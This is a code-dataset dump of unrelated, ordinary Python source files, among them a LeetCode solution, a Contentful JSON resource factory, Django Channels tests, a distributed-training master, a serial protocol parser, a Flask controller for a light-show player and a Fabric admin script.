id stringlengths 1 265 | text stringlengths 6 5.19M | dataset_id stringclasses 7
values |
|---|---|---|
1763606 | <filename>easy/1374-Generate a String With Characters That Have Odd Counts.py
"""
https://leetcode.com/problems/generate-a-string-with-characters-that-have-odd-counts/
Given an integer n, return a string with n characters such that each character in such string occurs an odd number of times.
The returned string must contain only lowercase English letters. If there are multiples valid strings, return any of them.
Example 1:
Input: n = 4
Output: "pppz"
Explanation: "pppz" is a valid string since the character 'p' occurs three times and the character 'z' occurs once. Note that there are many other valid strings such as "ohhh" and "love".
Example 2:
Input: n = 2
Output: "xy"
Explanation: "xy" is a valid string since the characters 'x' and 'y' occur once. Note that there are many other valid strings such as "ag" and "ur".
Example 3:
Input: n = 7
Output: "holasss"
Constraints:
1 <= n <= 500
"""
# time complexity: O(n), space complexity: O(1)
class Solution:
def generateTheString(self, n: int) -> str:
if n % 2 == 0:
return 'a'*(n-1)+'b'
else:
return 'a'*n
| StarcoderdataPython |
3292458 | <gh_stars>1-10
"""serialization module.
Classes provided include:
:class:`ResourceFactory` - Factory for generating :class:`.resources.Resource` subclasses out of JSON data.
"""
from .fields import Boolean, Date, Number, Object, Symbol, Text, List, MultipleAssets, MultipleEntries
from .resources import ResourceType, Array, Entry, Asset, Space, ContentType, ResourceLink
from dateutil import parser
import ast
import copy
class ResourceFactory(object):
"""Factory for generating :class:`.resources.Resource` subclasses out of JSON data.
Attributes:
entries_mapping (dict): Mapping of Content Type IDs to custom Entry subclasses.
"""
def __init__(self, custom_entries):
"""ResourceFactory constructor.
:param custom_entries: list of custom Entry subclasses.
:return: ResourceFactory instance.
"""
super(ResourceFactory, self).__init__()
self.entries_mapping = {}
if custom_entries is not None:
for c in custom_entries:
ct = c.__content_type__
self.entries_mapping[ct] = c
def from_json(self, json):
"""Create resource out of JSON data.
:param json: JSON dict.
:return: Resource with a type defined by the given JSON data.
"""
res_type = json['sys']['type']
if ResourceType.Array.value == res_type:
return self.create_array(json)
elif ResourceType.Entry.value == res_type:
return self.create_entry(json)
elif ResourceType.Asset.value == res_type:
return ResourceFactory.create_asset(json)
elif ResourceType.ContentType.value == res_type:
return ResourceFactory.create_content_type(json)
elif ResourceType.Space.value == res_type:
return ResourceFactory.create_space(json)
@staticmethod
def _extract_link(obj):
if not isinstance(obj, dict):
return None
sys = obj.get('sys')
if isinstance(sys, dict) and sys.get('type') == ResourceType.Link.value:
return ResourceLink(sys)
return None
def create_entry(self, json):
"""Create :class:`.resources.Entry` from JSON.
:param json: JSON dict.
:return: Entry instance.
"""
sys = json['sys']
ct = sys['contentType']['sys']['id']
fields = json['fields']
raw_fields = copy.deepcopy(fields)
# Replace links with :class:`.resources.ResourceLink` objects.
for k, v in fields.items():
link = ResourceFactory._extract_link(v)
if link is not None:
fields[k] = link
elif isinstance(v, list):
for idx, ele in enumerate(v):
link = ResourceFactory._extract_link(ele)
if link is not None:
v[idx] = link
if ct in self.entries_mapping:
clazz = self.entries_mapping[ct]
result = clazz()
for k, v in clazz.__entry_fields__.items():
field_value = fields.get(v.field_id)
if field_value is not None:
setattr(result, k, ResourceFactory.convert_value(field_value, v))
else:
result = Entry()
result.sys = sys
result.fields = fields
result.raw_fields = raw_fields
return result
@staticmethod
def create_asset(json):
"""Create :class:`.resources.Asset` from JSON.
:param json: JSON dict.
:return: Asset instance.
"""
result = Asset(json['sys'])
file_dict = json['fields']['file']
result.fields = json['fields']
result.url = file_dict['url']
result.mimeType = file_dict['contentType']
return result
@staticmethod
def create_content_type(json):
"""Create :class:`.resource.ContentType` from JSON.
:param json: JSON dict.
:return: ContentType instance.
"""
result = ContentType(json['sys'])
for field in json['fields']:
field_id = field['id']
del field['id']
result.fields[field_id] = field
result.name = json['name']
result.display_field = json.get('displayField')
return result
@staticmethod
def create_space(json):
"""Create :class:`.resources.Space` from JSON.
:param json: JSON dict.
:return: Space instance.
"""
result = Space(json['sys'])
result.name = json['name']
return result
@staticmethod
def convert_value(value, field):
"""Given a :class:`.fields.Field` and a value, ensure that the value matches the given type, otherwise
attempt to convert it.
:param value: field value.
:param field: :class:`.fields.Field` instance.
:return: Result value.
"""
clz = field.field_type
if clz is Boolean:
if not isinstance(value, bool):
return bool(value)
elif clz is Date:
if not isinstance(value, str):
value = str(value)
return parser.parse(value)
elif clz is Number:
if not isinstance(value, int):
return int(value)
elif clz is Object:
if not isinstance(value, dict):
return ast.literal_eval(value)
elif clz is Text or clz is Symbol:
if not isinstance(value, str):
return str(value)
elif clz is List or clz is MultipleAssets or clz is MultipleEntries:
if not isinstance(value, list):
return [value]
# No need to convert :class:`.fields.Link` types as the expected value
# should be of type :class:`.resources.ResourceLink` for links.
return value
# Array
def process_array_items(self, array, json):
"""Iterate through all `items` and create a resource for each.
In addition map the resources under the `items_mapped` by the resource id and type.
:param array: Array resource.
:param json: Raw JSON dictionary.
"""
for item in json['items']:
key = None
processed = self.from_json(item)
if isinstance(processed, Asset):
key = 'Asset'
elif isinstance(processed, Entry):
key = 'Entry'
if key is not None:
array.items_mapped[key][processed.sys['id']] = processed
array.items.append(processed)
def process_array_includes(self, array, json):
"""Iterate through all `includes` and create a resource for every item.
In addition map the resources under the `items_mapped` by the resource id and type.
:param array: Array resource.
:param json: Raw JSON dictionary.
"""
includes = json.get('includes') or {}
for key in array.items_mapped.keys():
if key in includes:
for resource in includes[key]:
processed = self.from_json(resource)
array.items_mapped[key][processed.sys['id']] = processed
def create_array(self, json):
"""Create :class:`.resources.Array` from JSON.
:param json: JSON dict.
:return: Array instance.
"""
result = Array(json['sys'])
result.total = json['total']
result.skip = json['skip']
result.limit = json['limit']
result.items = []
result.items_mapped = {'Asset': {}, 'Entry': {}}
self.process_array_items(result, json)
self.process_array_includes(result, json)
return result | StarcoderdataPython |
65886 | # -*- coding: utf-8 -*-
# pip install pdfminer.six -i https://pypi.doubanio.com/simple
import io
from pdfminer.high_level import *
sys.stdout = io.TextIOWrapper(sys.stdout.buffer, encoding='utf-8')
def return_txt():
name = sys.argv[1]
text = extract_text(name)
print(text)
if __name__ == '__main__':
return_txt() | StarcoderdataPython |
93635 | import pytest
from asgiref.sync import sync_to_async
from channels.testing import WebsocketCommunicator
from realtime_api.testing import AuthWebsocketCommunicator, create_user
from realtime_api.utils import get_group_user_key, close_user_channels
from .consumers import GroupTestConsumer
def test_group_does_not_exist():
assert close_user_channels('some-pk') is None
def test_get_group_user_name():
assert get_group_user_key('') == '.user'
assert get_group_user_key(35) == '.user35'
assert get_group_user_key('key') == '.userkey'
@pytest.mark.asyncio
async def test_close_user_channels_authenticated(user):
communicator = await AuthWebsocketCommunicator(
GroupTestConsumer,
'/',
user=user,
)
connected, subprotocol = await communicator.connect()
assert connected
await sync_to_async(close_user_channels)(user.pk)
response = await communicator.receive_from()
assert response == 'Socket closes with code 3'
@pytest.mark.asyncio
async def test_close_user_channels_no_user():
communicator = WebsocketCommunicator(GroupTestConsumer, '/')
connected, subprotocol = await communicator.connect()
assert connected
await sync_to_async(close_user_channels)('')
response = await communicator.receive_from()
assert response == 'Socket closes with code 3'
@pytest.mark.asyncio
async def test_close_user_channels_multiple_connections(user):
user2 = await create_user('Simon')
user3 = await create_user('Mary')
c_u11 = await AuthWebsocketCommunicator(GroupTestConsumer, '/', user=user)
c_u12 = await AuthWebsocketCommunicator(GroupTestConsumer, '/', user=user)
c_u13 = await AuthWebsocketCommunicator(GroupTestConsumer, 't', user=user)
c_u21 = await AuthWebsocketCommunicator(GroupTestConsumer, '/', user=user2)
c_u22 = await AuthWebsocketCommunicator(GroupTestConsumer, '/', user=user2)
c_u31 = await AuthWebsocketCommunicator(GroupTestConsumer, 't', user=user3)
c_u32 = await AuthWebsocketCommunicator(GroupTestConsumer, 't', user=user3)
c_n1 = await AuthWebsocketCommunicator(GroupTestConsumer, '/')
c_n2 = WebsocketCommunicator(GroupTestConsumer, '/')
c_n3 = WebsocketCommunicator(GroupTestConsumer, 't')
connected, subprotocol = await c_u11.connect()
connected, subprotocol = await c_u12.connect()
connected, subprotocol = await c_u13.connect()
connected, subprotocol = await c_u21.connect()
connected, subprotocol = await c_u22.connect()
connected, subprotocol = await c_u31.connect()
connected, subprotocol = await c_u32.connect()
connected, subprotocol = await c_n1.connect()
connected, subprotocol = await c_n2.connect()
connected, subprotocol = await c_n3.connect()
await sync_to_async(close_user_channels)(user.pk)
assert not await c_u11.receive_nothing(0.02)
assert not await c_u12.receive_nothing(0.02)
assert not await c_u13.receive_nothing(0.02)
assert await c_u21.receive_nothing(0.02)
assert await c_u22.receive_nothing(0.02)
assert await c_u31.receive_nothing(0.02)
assert await c_u32.receive_nothing(0.02)
assert await c_n1.receive_nothing(0.02)
assert await c_n2.receive_nothing(0.02)
assert await c_n3.receive_nothing(0.02)
r1 = await c_u11.receive_from()
r2 = await c_u12.receive_from()
r3 = await c_u13.receive_from()
assert r1 == r2 == r3 == 'Socket closes with code 3'
await sync_to_async(close_user_channels)('')
assert await c_u11.receive_nothing(0.02)
assert await c_u12.receive_nothing(0.02)
assert await c_u13.receive_nothing(0.02)
assert await c_u21.receive_nothing(0.02)
assert await c_u22.receive_nothing(0.02)
assert await c_u31.receive_nothing(0.02)
assert await c_u32.receive_nothing(0.02)
assert not await c_n1.receive_nothing(0.02)
assert not await c_n2.receive_nothing(0.02)
assert not await c_n3.receive_nothing(0.02)
r1 = await c_n1.receive_from()
r2 = await c_n2.receive_from()
r3 = await c_n3.receive_from()
assert r1 == r2 == r3 == 'Socket closes with code 3'
await c_u21.disconnect()
await c_u22.disconnect()
await c_u31.disconnect()
await c_u32.disconnect()
| StarcoderdataPython |
1657322 | from distutils.core import setup
from setuptools import find_packages
setup(
name="pandasql3",
version="0.7.3",
author="<NAME>",
author_email="<EMAIL>",
url="https://github.com/dunakeyr/pandasql3/",
license="MIT",
packages=find_packages(),
package_dir={"pandasql": "pandasql"},
package_data={"pandasql": ["data/*.csv"]},
description="sqldf for pandas",
long_description=open("README.rst").read(),
install_requires=['numpy', 'pandas', 'sqlalchemy'],
classifiers=[
"License :: OSI Approved :: MIT License",
],
)
| StarcoderdataPython |
1609410 | <reponame>shashankrnr32/pytkdocs<filename>tests/fixtures/unwrap_getattr_raises.py
class TryMe:
def __getattr__(self, item):
raise ValueError
TRY_ME = TryMe()
| StarcoderdataPython |
4811562 | <gh_stars>0
from fabric.api import env, run, sudo, put
import collections
import json
import requests
response = requests.get('http://%s:8080/' % optica_ip)
hosts = json.loads(response.text)
# fill the role list
env.roledefs = collections.defaultdict(lambda: [])
for hostinfo in hosts['nodes'].values():
env.roledefs[hostinfo['role']].append(hostinfo['hostname'])
# show the roll list if no role selected
if not env.roles:
print "Available roles:\n"
for role in sorted(env.roledefs.keys()):
count = len(env.roledefs[role])
print " %-30s %3d machine%s" % (role, count, "s" if count > 1 else "")
print ""
def uptime():
"""Check the uptime on a node"""
run('uptime')
def restart_service(service_name):
"""Restart a specified service (e.g. `fab restart_service:nginx`)"""
sudo('service %s restart' % service_name)
| StarcoderdataPython |
1685862 | '''
sparse vector based on defaultdict
Modifications for Python 3 made by <NAME>
'''
__author__ = "lhuang"
from collections import defaultdict
class svector(defaultdict):
def __init__(self, old=None):
if old is not None:
defaultdict.__init__(self, float, old)
else:
defaultdict.__init__(self, float)
def __iadd__(self, other): # a += b
for k, v in other.items():
self[k] += v
return self
def __add__(self, other): # a + b
new = svector()
for k, v in self.items():
new[k] = v
for k, v in other.items():
new[k] += v
return new
def __sub__(self, other): # a - b
return self + (-1) * other
def __isub__(self, other): # a -= b
self += (-1) * other
return self
def __mul__(self, c): # v * c where c is scalar
new = svector()
for k, v in self.items():
new[k] = v * c
return new
__rmul__ = __mul__ # c * v where c is scalar
def dot(self, other): # dot product
a, b = (self, other) if len(self) < len(other) else (other, self) # fast
return sum(v * b[k] for k, v in a.items())
def __neg__(self): # -a
new = svector()
for k, v in self.items():
new[k] = -v
return new
def copy(self):
return svector(self)
| StarcoderdataPython |
3249943 | #####
#
# This class is part of the Programming the Internet of Things
# project, and is available via the MIT License, which can be
# found in the LICENSE file at the top level of this repository.
#
# You may find it more helpful to your design to adjust the
# functionality, constants and interfaces (if there are any)
# provided within in order to meet the needs of your specific
# Programming the Internet of Things project.
#
# Import logging and setup it
import logging,logging.config
logging.config.fileConfig("logging.conf")
from time import sleep
from programmingtheiot.common import ConfigConst
from programmingtheiot.common.ConfigUtil import ConfigUtil
from programmingtheiot.cda.app.DeviceDataManager import DeviceDataManager
from programmingtheiot.cda.system.SystemPerformanceManager import SystemPerformanceManager
class ConstrainedDeviceApp():
"""
Definition of the ConstrainedDeviceApp class.
"""
def __init__(self):
"""
Initialization of class.
Create DeviceDataManager instance.
"""
logging.info("Initializing CDA...")
self.devDataManager = DeviceDataManager()
def startApp(self):
"""
Start the CDA:
Start DeviceDataManager.
"""
logging.info("Starting CDA...")
self.devDataManager.startManager()
logging.info("CDA started.")
def stopApp(self, code: int):
"""
Stop the CDA.
Stop DeviceDataManager.
"""
logging.info("CDA stopping...")
self.devDataManager.stopManager()
logging.info("CDA stopped with exit code %s.", str(code))
def parseArgs(self, args):
"""
Parse command line args.
@param args The arguments to parse.
"""
logging.info("Parsing command line args...")
def main():
"""
Main function definition for running client as application.
Current implementation runs for 65 seconds then exits.
"""
run_time = ConfigUtil().getInteger(ConfigConst.CONSTRAINED_DEVICE,ConfigConst.TEST_CDA_RUN_TIME_KEY,-1)
cda = ConstrainedDeviceApp()
cda.startApp()
import asyncio
if run_time < 0:
loop = asyncio.get_event_loop()
try:
loop.run_forever()
finally:
loop.close()
else:
sleep(run_time)
cda.stopApp(0)
if __name__ == '__main__':
"""
Attribute definition for when invoking as app via command line
"""
main()
| StarcoderdataPython |
4829338 | <gh_stars>0
# -*- coding: utf-8 -*-
# Copyright (C) 2020. Huawei Technologies Co., Ltd. All rights reserved.
# This program is free software; you can redistribute it and/or modify
# it under the terms of the MIT License.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# MIT License for more details.
"""The main part of the cluster framework.
The Master Class to create, maintain distribute framework and distribute
calculate tasks.
"""
import os
import sys
import copy
import logging
import time
import traceback
from queue import Queue
from ..trainer import utils
from .distribution import ClusterDaskDistributor, LocalDistributor
from vega.core.common import UserConfig, TaskOps
from vega.core.common.consts import ClusterMode
from .local_master import LocalMaster
from .worker_env import WorkerEnv
from .dask_env import DaskEnv
class Master(object):
"""The Master Class is to create, maintain distribute framework and distribute calculate tasks.
:param argparse.ArgumentParser args: `args` is a argparse that should
contain `init_method`, `rank` and `world_size`.
:param Config cfg: `cfg`.
"""
__master_path__ = None
def __new__(cls):
"""Return a LocalMaster instance when run on local, else return a master instance."""
mode = UserConfig().data.general.cluster_mode
gpus = str(UserConfig().data.general.worker.gpus_per_job)
if mode == ClusterMode.Single and gpus == "-1":
return LocalMaster()
else:
return object.__new__(cls)
def __init__(self):
"""Init master attrs, setup and start dask distributed cluster and local multiprocess pool."""
self.cfg = copy.deepcopy(UserConfig().data.general)
self.task_count = 0
self.eval_count = self.cfg.worker.eval_count
self.dask_env = DaskEnv(UserConfig().data.env,
self.__master_path__,
self.cfg.worker.gpus_per_job,
TaskOps(self.cfg).temp_path)
status = self.dask_env.start()
if not status or not self.dask_env.is_master:
sys.exit(0)
self._start_cluster()
self._start_evaluator_multiprocess()
self.t_queue = Queue()
# now save GPU and Dloop Evaluator result.
self.e_queue = utils.PairDictQueue()
return
def _start_cluster(self):
"""Set and start dask distributed cluster."""
self.md = ClusterDaskDistributor(self.dask_env.master_address)
self.client = self.md.get_client()
local_host = None
if "BATCH_CURRENT_HOST" in os.environ:
local_host = os.environ["BATCH_CURRENT_HOST"]
elif "BATCH_CUSTOM0_HOSTS" in os.environ:
local_host = os.environ["BATCH_CUSTOM0_HOSTS"]
plugin = WorkerEnv(self.dask_env.slave_proc_num,
self.dask_env.slave_gpus_per_proc,
local_host,
os.getpid(),
TaskOps(self.cfg).temp_path)
self.client.register_worker_plugin(plugin)
return
def _start_evaluator_multiprocess(self):
"""Set and start local multiprocess pool."""
self.dmd = LocalDistributor(self.eval_count)
return
@property
def has_free_worker(self):
"""Property: check is has free dask worker.
:return: return Ture if has free dask worker, otherwise return False.
:rtype: bool
"""
if self.md.process_queue_full():
return False
else:
return True
def run(self, worker):
"""Run a distributed_worker on different cluster.
:param worker: A serializable object (callable and has `__call__`
function) which need to be distributed calculaton.
:type worker: object that the class was inherited from DistributedWorker.
"""
if worker is None:
return
if worker.worker_type == utils.WorkerTypes.EVALUATOR:
for sub_worker in worker.sub_worker_list:
self.run(sub_worker)
self.e_queue.add_new("{}::{}".format(sub_worker.step_name, sub_worker.worker_id),
sub_worker.worker_type.name)
elif worker.worker_type == utils.WorkerTypes.HAVA_D_EVALUATOR:
p_id = self.task_count
if worker.step_name and worker.worker_id:
logging.info("master run EVALUATE_DLOOP")
p_id = "{0}::{1}::{2}".format(worker.worker_type.name,
worker.step_name,
worker.worker_id)
self.dmd.distribute(pid=p_id, func=worker, kwargs={})
return p_id
else:
finished = False
while not finished:
if not self.md.process_queue_full():
p_id = self.task_count
if worker.step_name is not None and worker.worker_id is not None:
p_id = "{0}::{1}::{2}".format(worker.worker_type.name,
worker.step_name,
worker.worker_id)
self.md.distribute(client=self.client, pid=p_id,
func=worker, kwargs={})
self.task_count = self.task_count + 1
return p_id
else:
time.sleep(0.1)
return
def join(self):
"""Wait all workers to finished."""
self.md.join()
self.dmd.join()
return
def update_status(self):
"""Update Master queue status."""
t_pid, _ = self.md.result_queue_get()
if t_pid is not None:
pid_splited = t_pid.split("::")
if len(pid_splited) >= 3:
type = pid_splited[0]
pid = "{0}::{1}".format(pid_splited[1], pid_splited[2])
if type == utils.WorkerTypes.TRAINER.name:
self.t_queue.put(pid)
else:
self.e_queue.put(item=pid, type=type)
dloop_pid = self.dmd.process_result_get()
if dloop_pid is not None:
pid_splited = dloop_pid.split("::")
if len(pid_splited) >= 3:
type = pid_splited[0]
pid = "{0}::{1}".format(pid_splited[1], pid_splited[2])
self.e_queue.put(item=pid, type=type)
return
def get_result_from_worker(self):
"""Get a result from a finished worker in dask cluster.
:return: the pid and result of a finished worker if there are finished
worker in queue, otherwise return(None, None).
:rtype: (pid, result) or (None, None)
"""
if not self.md.result_queue_empty():
pid, result = self.md.result_queue_get()
return pid, result
else:
return None, None
def pop_finished_worker(self, train_worker=True):
"""Pop a finished dask worker's info, if there are finished dask worker in queue.
:return: the finished worker info, include step_name and worker_id.
eg. {"step_name":"round1", "worker_id":1}
:rtype: dict or None
"""
self.update_status()
pid = None
if train_worker and not self.t_queue.empty():
pid = self.t_queue.get()
else:
pid = self.e_queue.get()
if pid is None:
return None
else:
pid_splited = pid.split("::")
if len(pid_splited) < 2:
return None
else:
return {"step_name": pid_splited[0],
"worker_id": pid_splited[1]}
def pop_finished_train_worker(self):
"""Pop a finished evaluator worker's info, if there are finished evaluate workers in pool.
:return: the finished worker info, include step_name and worker_id.
eg. {"step_name":"round1", "worker_id":1}
:rtype: dict or None
"""
return self.pop_finished_worker(train_worker=True)
def pop_finished_evaluate_worker(self):
"""Pop a finished evaluator worker's info, if there are finished evaluate workers in pool.
:return: the finished worker info, include step_name and worker_id.
eg. {"step_name":"round1", "worker_id":1}
:rtype: dict or None
"""
return self.pop_finished_worker(train_worker=False)
def pop_all_finished_train_worker(self):
"""Pop all finished train worker's info.
:return: a finished worker info list.
:rtype: list of dict
"""
worker_info_list = []
finished_train_worker_info = self.pop_finished_train_worker()
while finished_train_worker_info is not None:
worker_info_list.append(finished_train_worker_info)
finished_train_worker_info = self.pop_finished_train_worker()
return worker_info_list
def pop_all_finished_evaluate_worker(self):
"""Pop all finished evaluator worker's info.
:return: a finished worker info list.
:rtype: list of dict
"""
worker_info_list = []
finished_evaluate_worker_info = self.pop_finished_evaluate_worker()
while finished_evaluate_worker_info is not None:
worker_info_list.append(finished_evaluate_worker_info)
finished_evaluate_worker_info = self.pop_finished_evaluate_worker()
return worker_info_list
def close_client(self):
"""Close cluster client."""
if hasattr(self, "client") and self.client is not None:
self.client.close()
del self.client
@staticmethod
def shutdown():
"""Shutdown all distributed cluster."""
mode = UserConfig().data.general.cluster_mode
gpus = str(UserConfig().data.general.worker.gpus_per_job)
if mode == ClusterMode.Single and gpus == "-1":
return
try:
logging.info("Try to shutdown cluster.")
from vega.core.trainer.utils import get_write_ip_master_local
from distributed import Client
ip, port = get_write_ip_master_local()
if ip is None or port is None:
logging.info("Stand-alone mode, no need to shut down the cluster.")
return
shutdown_client = Client("{}:{}".format(ip, port))
logging.info("Cluster will be shut down.")
shutdown_client.shutdown()
shutdown_client.close()
del shutdown_client
logging.info("Cluster is shut down.")
except Exception as e:
logging.error("Pipeline's cluster shutdown error: {}".format(str(e)))
logging.error(traceback.format_exc())
| StarcoderdataPython |
3315408 | <filename>crsf_drv/parse_serial.py<gh_stars>0
#!/usr/bin/env python3
from operator import contains
import os
from typing import Container, final
from crsf_parser import CRSFParser
from serial import Serial
def print_frame(frame: Container) -> None:
print(frame)
crsf_parser = CRSFParser(print_frame)
with Serial("/dev/ttyUSB0", 425000, timeout=2) as ser:
input = bytearray()
while True:
values = ser.read(100)
input.extend(values)
crsf_parser.parse_stream(input)
| StarcoderdataPython |
71464 | from django.conf.urls import include, url
import django_eventstream
from . import views
urlpatterns = [
url(r'^$', views.home),
url(r'^events/', include(django_eventstream.urls)),
]
| StarcoderdataPython |
3244564 | #################################################################
# falcon-player-controller-uploadr #
# Copyright (c) 2017 atomicnumber1 #
#################################################################
import os
import subprocess
import logging
import logging.handlers
from flask import Flask
from flask_restful import (reqparse, Api, Resource)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
SCRIPTS_DIR = os.path.join(BASE_DIR, 'scripts')
LOG_FILENAME = os.path.join(BASE_DIR, 'logs', 'falcon_player_controller.log')
logger = logging.getLogger('FalconPlayerController')
logger.setLevel(logging.DEBUG)
# Add the log message handler to the logger
handler = logging.handlers.RotatingFileHandler(
LOG_FILENAME, maxBytes=10*1024*1024, backupCount=5)
logger.addHandler(handler)
FPPApp = Flask(__name__)
FPPApi = Api(FPPApp)
ACTIONS_SUPPORTED = [
'start',
'pause',
'stop',
'reboot',
'shutdown'
]
STATUS_CODES = {
'Success': 0,
'PlayError': 1,
'PauseError': 2,
'StopError': 3,
'RebootError': 4,
'ShutdownError': 5,
'SSIDUpdated': 6,
'SSIDNotUpdated': 7,
'SSIDCheckError': 8,
'SSIDUpdateError': 9,
}
def gen_response(status, msg):
return {'status': status, 'msg': msg}
# Info
# shows info about supported actions
class Info(Resource):
def get(self):
return gen_response(STATUS_CODES['Success'], ACTIONS_SUPPORTED)
# Playlist
# performs the requested playlist actions
class Playlist(Resource):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.actions = {
'play': lambda x: self.play_playlist(x),
'pause': lambda x: self.pause_playlist(),
'stop': lambda x: self.stop_playlist(),
}
self.default = lambda x: gen_response(STATUS_CODES['Success'], list(self.actions.keys()))
def get(self, action, playlist):
return self.actions.get(action, self.default)(playlist)
def play_playlist(self, playlist):
if playlist == 'audio':
try:
subprocess.check_call(['bash', '{}/StartAudioPlaylist.sh'.format(SCRIPTS_DIR)])
return gen_response(STATUS_CODES['Success'], 'Playing Audio Playlist')
except subprocess.CalledProcessError as e:
logger.error('Error Occurred during execution of StartAudioPlaylist:\n{}'.format(e))
return gen_response(STATUS_CODES['PlayError'], 'Ooops! Something\'s Wrong')
elif playlist == 'video':
try:
subprocess.check_call(['bash', '{}/StartVideoPlaylist.sh'.format(SCRIPTS_DIR)])
return gen_response(STATUS_CODES['Success'], 'Playing Video Playlist')
except subprocess.CalledProcessError as e:
logger.error('Error Occurred during execution of StartVideoPlaylist:\n{}'.format(e))
return gen_response(STATUS_CODES['PlayError'], 'Ooops! Something\'s Wrong')
return gen_response(STATUS_CODES['PlayError'], 'Yikes! No Such Playlist!')
def pause_playlist(self, **kwargs):
logger.warning("[pause_playlist] Not Implemented function.")
return gen_response(STATUS_CODES['PauseError'], 'Oops! Not Implemented yet')
def stop_playlist(self, **kwargs):
try:
subprocess.Popen(['bash', '{}/stopfpp.sh'.format(SCRIPTS_DIR)])
return gen_response(STATUS_CODES['Success'], 'Stopped Playlist')
except Exception as e:
logger.error('Error Occurred during execution of stopfpp:\n{}'.format(e))
return gen_response(STATUS_CODES['StopError'], 'Ooops! Something\'s Wrong')
class System(Resource):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.parser = reqparse.RequestParser()
self.parser.add_argument('wifi_ssid')
self.actions = {
'reboot': self.reboot,
'shutdown': self.shutdown,
'check_ssid': self.check_ssid,
}
self.default = lambda: gen_response(STATUS_CODES['Success'], list(self.actions.keys()) + list('update_ssid'))
def get(self, action):
return self.actions.get(action, self.default)()
def post(self, action):
args = self.parser.parse_args()
wifi_ssid = args.get('wifi_ssid', '')
if not wifi_ssid:
return gen_response(STATUS_CODES['SSIDUpdateError'], 'WiFi SSID can\'t be null.\nPlease provide a valid WiFi SSID.')
elif not str(wifi_ssid).isalnum():
return gen_response(STATUS_CODES['SSIDUpdateError'], 'Only alphanumeric characters are allowed.\nPlease provide a valid WiFi SSID.')
return self.update_ssid(wifi_ssid)
def reboot(self):
try:
subprocess.Popen(['bash', '{}/reboot.sh'.format(SCRIPTS_DIR)])
return gen_response(STATUS_CODES['Success'], 'Rebooting Pi in 10 secs!')
except Exception as e:
logger.error('Error Occurred while Rebooting:\n{}'.format(e))
return gen_response(STATUS_CODES['RebootError'], 'Ooops! Something\'s Wrong')
def shutdown(self):
try:
subprocess.Popen(['bash', '{}/shutdown.sh'.format(SCRIPTS_DIR)])
return gen_response(STATUS_CODES['Success'], 'Shutting down Pi in 10 secs!')
except Exception as e:
logger.error('Error Occurred while Shutting down:\n{}'.format(e))
return gen_response(STATUS_CODES['ShutdownError'], 'Ooops! Something\'s Wrong')
def check_ssid(self):
try:
ssid_status = str(subprocess.check_output(['bash', '{}/check_ssid.sh'.format(SCRIPTS_DIR)]))
if '1' in ssid_status:
return gen_response(STATUS_CODES['SSIDUpdated'], 'WiFi SSID is already Updated.\nNote: You can only update once.')
else:
return gen_response(STATUS_CODES['SSIDNotUpdated'], 'WiFi SSID not updated! Please update WiFi SSID.')
except subprocess.CalledProcessError as e:
logger.error('Error Occurred while Checking for wifi ssid:\n{}'.format(e))
return gen_response(STATUS_CODES['SSIDCheckError'], 'Ooops! Something\'s Wrong')
def update_ssid(self, wifi_ssid):
try:
subprocess.check_call(['bash', '{}/update_ssid.sh'.format(SCRIPTS_DIR), wifi_ssid])
logger.info('WiFi SSID Updated to {}'.format(wifi_ssid))
return gen_response(STATUS_CODES['Success'], 'WiFi SSID is Updated! System will now reboot.')
except subprocess.CalledProcessError as e:
logger.error('Error Occurred while Updating WiFi SSID:\n')
logger.error(e)
return gen_response(STATUS_CODES['SSIDUpdateError'], 'Ooops! Something\'s Wrong')
##
## Actually setup the Api resource routing here
##
FPPApi.add_resource(Info, '/')
FPPApi.add_resource(System, '/<action>')
FPPApi.add_resource(Playlist, '/<action>/<playlist>')
if __name__ == "__main__":
FPPApp.secret_key = '<KEY>'
from gevent.wsgi import WSGIServer
address = ("0.0.0.0", 2017)
server = WSGIServer(address, FPPApp,
log=logger, error_log=logger)
try:
logger.info("Server running on port %s:%d. Ctrl+C to quit" % address)
server.serve_forever()
except KeyboardInterrupt:
server.stop()
logger.info("Bye bye")
| StarcoderdataPython |
4822133 | """
IO-Tools
--------
Tools for input and output.
"""
from pathlib import Path
from datetime import datetime
from typing import Iterable
from generic_parser.entry_datatypes import get_instance_faker_meta
from generic_parser.entrypoint_parser import save_options_to_config
from pylhc_submitter.constants.general import TIME
# Output -----------------------------------------------------------------------
def save_config(output_dir: Path, opt: dict, script: str):
"""
Quick wrapper for ``save_options_to_config``.
Args:
output_dir (Path): Path to the output directory (does not need to exist).
opt (dict): opt-structure to be saved.
script (str): path/name of the invoking script (becomes name of the .ini)
usually ``__file__``.
"""
output_dir.mkdir(parents=True, exist_ok=True)
opt = convert_paths_in_dict_to_strings(opt)
opt = escape_percentage_signs(opt)
time = datetime.utcnow().strftime(TIME)
save_options_to_config(output_dir / f"{script:s}_{time:s}.ini",
dict(sorted(opt.items()))
)
def escape_percentage_signs(dict_: dict) -> dict:
"""Escape all percentage signs.
They are used for interpolation in the config-parser."""
for key, value in dict_.items():
if isinstance(value, dict):
dict_[key] = escape_percentage_signs(value)
elif isinstance(value, str):
dict_[key] = value.replace("%(", "%%(")
return dict_
def convert_paths_in_dict_to_strings(dict_: dict) -> dict:
"""Converts all Paths in the dict to strings, including those in iterables."""
dict_ = dict_.copy()
for key, value in dict_.items():
if isinstance(value, Path):
dict_[key] = str(value)
else:
try:
list_ = list(value)
except TypeError:
pass
else:
has_changed = False
for idx, item in enumerate(list_):
if isinstance(item, Path):
list_[idx] = str(item)
has_changed = True
if has_changed:
dict_[key] = list_
return dict_
# Input ------------------------------------------------------------------------
class PathOrStr(metaclass=get_instance_faker_meta(Path, str)):
"""A class that behaves like a Path when possible, otherwise like a string."""
def __new__(cls, value):
if value is None:
return None
if isinstance(value, str):
value = value.strip("\'\"") # behavior like dict-parser, IMPORTANT FOR EVERY STRING-FAKER
return Path(value)
def make_replace_entries_iterable(replace_dict: dict) -> dict:
""" Makes all entries in replace-dict iterable. """
for key, value in replace_dict.items():
if isinstance(value, str) or not isinstance(value, Iterable):
replace_dict[key] = [value]
return replace_dict
def keys_to_path(dict_, *keys):
""" Convert all keys to Path, if they are not None. """
for key in keys:
value = dict_[key]
dict_[key] = None if value is None else Path(value)
return dict_
| StarcoderdataPython |
